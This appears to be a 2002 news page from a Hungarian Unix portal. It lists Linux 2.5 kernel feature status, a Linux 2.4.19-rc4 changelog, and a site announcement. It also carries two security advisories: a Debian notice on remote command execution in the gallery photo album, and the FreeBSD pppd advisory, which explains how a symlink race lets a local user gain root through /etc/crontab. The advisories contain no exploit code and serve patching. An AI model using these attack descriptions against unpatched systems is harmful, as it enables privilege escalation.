    o Alpha NUMA aware scheduler extensions (Erich Focht)

    o Alpha Basic NUMA API (Matt Dobson)

    o Alpha NUMA topology support (Matt Dobson)

    o Alpha Non-linear memory support (Martin Bligh, Daniel Phillips)

    o Alpha Parallelizing page replacement (William Lee Irwin)

    o Alpha VM large page support (Simon Winwood, Hubertus Franke)

    o Alpha Remove waitqueue heads from kernel structures (William Lee Irwin)

    o Alpha Remove the global tasklist (William Lee Irwin)

    o Alpha USB gadget support (Stuart Lynne, Greg Kroah-Hartman)

    o Started Reiserfs v4 (Reiserfs team)

    o Started Serial ATA support (Andre Hedrick)

    o Started Fix device naming issues (Patrick Mochel, Greg Kroah-Hartman)

    o Started Replace initrd by initramfs (H. Peter Anvin, Al Viro)

    o Started Make AppleTalk use shared skbs and refcounting (Arnaldo Carvalho de Melo)

    o Started NUMA aware slab allocator (Martin Bligh)

    o Started SCSI multipath IO (with NUMA support) (Patrick Mansfield, Mike Anderson)

    o Started Overhaul PCMCIA support (David Woodhouse, David Hinds)

    o Started InfiniBand support (InfiniBand team)

    o Draft #2 New lightweight library (klibc) (Greg Kroah-Hartman)

    o Planning Generic parameter/command line interface (Keith Owens)

    o Planning New mount API (Al Viro)

    o Planning Add thrashing control (Rik van Riel)

    o Planning Remove all hardwired drivers from kernel (Alan Cox, etc.)


    Cleanups:

    Merged

    o in 2.5.3 Break Configure.help into multiple files (Linus Torvalds)

    o in 2.5.3 Untangle sched.h & fs.h include dependancies (Dave Jones, Roman Zippel)

    o in 2.5.4 Per network protocol slabcache & sock.h (Arnaldo Carvalho de Melo)

    o in 2.5.4 Per filesystem slabcache & fs.h (Daniel Phillips, Jeff Garzik, Al Viro)

    o in 2.5.6 Killing kdev_t for block devices (Al Viro)

    o in 2.5.18+ ->getattr() ->setattr() ->permission() changes (Al Viro)

    o in 2.5.21 Split up x86 setup.c into managable pieces (Patrick Mochel)

    o in 2.5.23+ Major MD tool (RAID 5) cleanup (Neil Brown)

    o Ready Switch to ->get_super() for file_system_type (Al Viro)

    o Beta file.h and INIT_TASK (Benjamin LaHaise)

    o Beta Proper UFS fixes, ext2 and locking cleanups (Al Viro)

    o Beta Lifting limitations on mount(2) (Al Viro)

    o Beta Remove dcache_lock (Maneesh Soni, IBM team)

    o Started Reorder x86 initialization (Dave Jones, Randy Dunlap)

    o Started Remove incomplete SPX network stack (Arnaldo Carvalho de Melo)

    o Started Rework datalink protocols to not use cli/sti (Arnaldo Carvalho de Melo)

    DSA-138-1: gallery - remote exploit

    Címkék

    Csomag: gallery

    Támadhatóság: remote exploit

    Probléma-típus: távoli

    Debian-specifikus: nem

    Problémát találtak a gallery (web alapú fotó album) eszközben. A probléma a GALLERY_BASEDIR változóval van. A hibát kihasználva lehetőség nyílhat arra, hogy a webszerveren parancsokat hajtson végre a rosszindulatú támadó a webszervert futtató felhasználó nevében (uid).

    A hiba javítva van az 1.2.5-7 verziójú Debian csomagban.

    Az eredeti hibajelentés: DSA-138-1

    Frissétésről szóló FAQ

    Marcelo Tosatti: Linux 2.4.19-rc4

    Címkék

    Miután feltűnt néhány kritikus hiba (elsődlegesen a d_unhash() SMP race) itt az rc4.

    Letölthető: patch-2.4.19-rc4.gz

    Változások:Summary of changes from v2.4.19-rc3 to v2.4.19-rc4

    ============================================

    (02/07/22 1.648)

    [PATCH] SMP race in d_unhash()

    (02/07/22 1.649)

    [PATCH] fix drivers/net/Config.in in 2.4.19-rc3

    (02/07/22 1.650)

    [PATCH] 2.4.19-rc3 include/linux/module.h

    (02/07/23 1.651)

    [PATCH] 2.4.19-rc3 - Coda

    (02/07/23 1.652)

    [PATCH] 2.4.19-rc3 remove dead variable CONFIG_DRM_AGP.

    (02/07/23 1.653)

    Changed EXTRAVERSION to -rc4

    (02/07/26 1.654)

    Make FastTrak be disabled by default

    (02/07/26 1.655)

    [PATCH] Re: [PATCH] Fixes to linux1394

    (02/07/29 1.656)

    [PATCH] penguin logo code

    (02/07/30 1.657)

    [PATCH] Remove support to some SiS IDE chipsets which were causing data corruption

    (02/07/30 1.658)

    [PATCH] Synchronize with a few left overs needed from -ac

    (02/07/30 1.659)

    [PATCH] More -ac merge

    (02/07/31 1.654.1.1)

    alpha pid-reporting POSIX comformance bug fix:

    (02/07/31 1.661)

    [PATCH] Add missing check to openprom driver

    FreeBSD Security Advisory: FreeBSD-SA-02:32.pppd

    Címkék

    Sebastian Krahmer [krahmer@suse.de] egy kihasználható 'race condition' típusú hibát talált a FreeBSD pppd implementációjában. A hiba FreeBSd összes kiadását érinti, beleértve a 4.6.1-RELEASE-p1-t is. A hiba javítva van az alábbi kiadásokban:

    2002-07-30 03:50:40 UTC (RELENG_4)

    2002-07-30 19:15:52 UTC (RELENG_4_6)

    2002-07-30 19:16:46 UTC (RELENG_4_5)

    2002-07-30 19:17:27 UTC (RELENG_4_4)

    A hiba nem FreeBSD specifikus. A javítás, workaround, patch és egyébb információkért olvasd el a bejelentést:========================================

    FreeBSD-SA-02:32.pppd Security Advisory The FreeBSD Project

    Topic: exploitable race condition in pppd

    Category: core

    Module: pppd

    Announced: 2002-07-31

    Credits: Sebastian Krahmer

    Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p1

    Corrected: 2002-07-30 03:50:40 UTC (RELENG_4)

    2002-07-30 19:15:52 UTC (RELENG_4_6)

    2002-07-30 19:16:46 UTC (RELENG_4_5)

    2002-07-30 19:17:27 UTC (RELENG_4_4)

    FreeBSD only: NO

    I. Background

    FreeBSD ships with several implementations of the Point-to-Point Protocol (PPP). The pppd program is one of these implementations. It provides basic support for negotiating a link, while encapsulation is done by driver code in the kernel.

    II. Problem Description

    A race condition exists in the pppd program that may be exploited in order to change the permissions of an arbitrary file. The file specified as the tty device is opened by pppd, and the permissions are recorded. If pppd fails to initialize the tty device in some way (such as a failure of tcgetattr(3)), then pppd will then attempt to

    restore the original permissions by calling chmod(2). The call to chmod(2) is subject to a symlink race, so that the permissions may `restored' on some other file.

    Note that the pppd program is installed set-user-ID to root, so that any file's permissions may be changed in this fashion.

    III. Impact

    A malicious local user may exploit the race condition to acquire write permissions to a critical system file, such as /etc/crontab, and leverage the situation to acquire escalated privileges.

    In FreeBSD 4.4-RELEASE and later, the local user must be in group `dialer' in order to run pppd and attempt to exploit this race.

    IV. Workaround

    Remove the set-user-ID bit from pppd by executing the following command as root:

    # chmod u-s /usr/sbin/pppd

    V. Solution

    Do one of the following:

    1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p2, 4.5-RELEASE-p11, or 4.4-RELEASE-p18).

    2) To patch your present system:

    The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches

    /SA-02:32/pppd.patch

    # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches

    /SA-02:32/pppd.patch.asc

    b) Execute the following commands as root:

    # cd /usr/src

    # patch
    # cd /usr/src/usr.sbin/pppd

    # make depend && make && make install

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    Path Revision Branch

    -----------------------------------------------------------------

    usr.bin/pppd/main.c

    RELENG_4 1.19.2.1

    RELENG_4_6 1.19.10.1

    RELENG_4_5 1.19.8.1

    RELENG_4_4 1.19.6.1

    sys/conf/newvers.sh

    RELENG_4_6 1.44.2.23.2.7

    RELENG_4_5 1.44.2.20.2.12

    RELENG_4_4 1.44.2.17.2.17

    ----------------------------------------------------------------

    Hungarian Unix Portal - PDA barát verzióban

    Erősen a nyárban vagyunk, éppen a szabadságolások közepette. Sokan rendelkezünk böngészésre alkalmas mobiltelefonnal, PDA készülékkel (ez ilyen informatikus betegség lehet :-) Többen kérték tőlem, hogy jó volna a ha lenne a Hungarian Unix Portal-nak PDA/WAP barát verziója, mert így a szabadság ideje alatt sem kellene nélkülözni a Unix világ híreit. Hát igen, ebben a világba egy hét kihagyás tényleg sok lenne :-)Ezért elkészítettem (huh, nagyon nehéz volt :-) az oldal PDA/WAP optimalizált verzióját. Mivel nekem a WAP-ról fogalmam sincs, a NOKIA 9110i-men el sem tudtam indítani ;), nem tudom, hogy a WAP-os készülékeken hogy mutat az oldal. A 9110-esemen viszont van HTTP browser, abban tökéletes. Gondolom a WAP sem lehet más nagyon. Egyelőre a szolgáltatást a /PDA verzió alatt lehet elérni, de terveim szerint a wap.hup.hu egyszerûsített forma is megvalósításra fog kerülni. A PDA/WAP verzióban az utolsó 10 cikket olvasható, rövid tömör formában.

    Jó nyaralást, jó WAP-ozást, PDA-zást.

    Ha valami probléma lenne a stuffal, akkor a /visszajelzés linken dobj egy levelet.

    -trey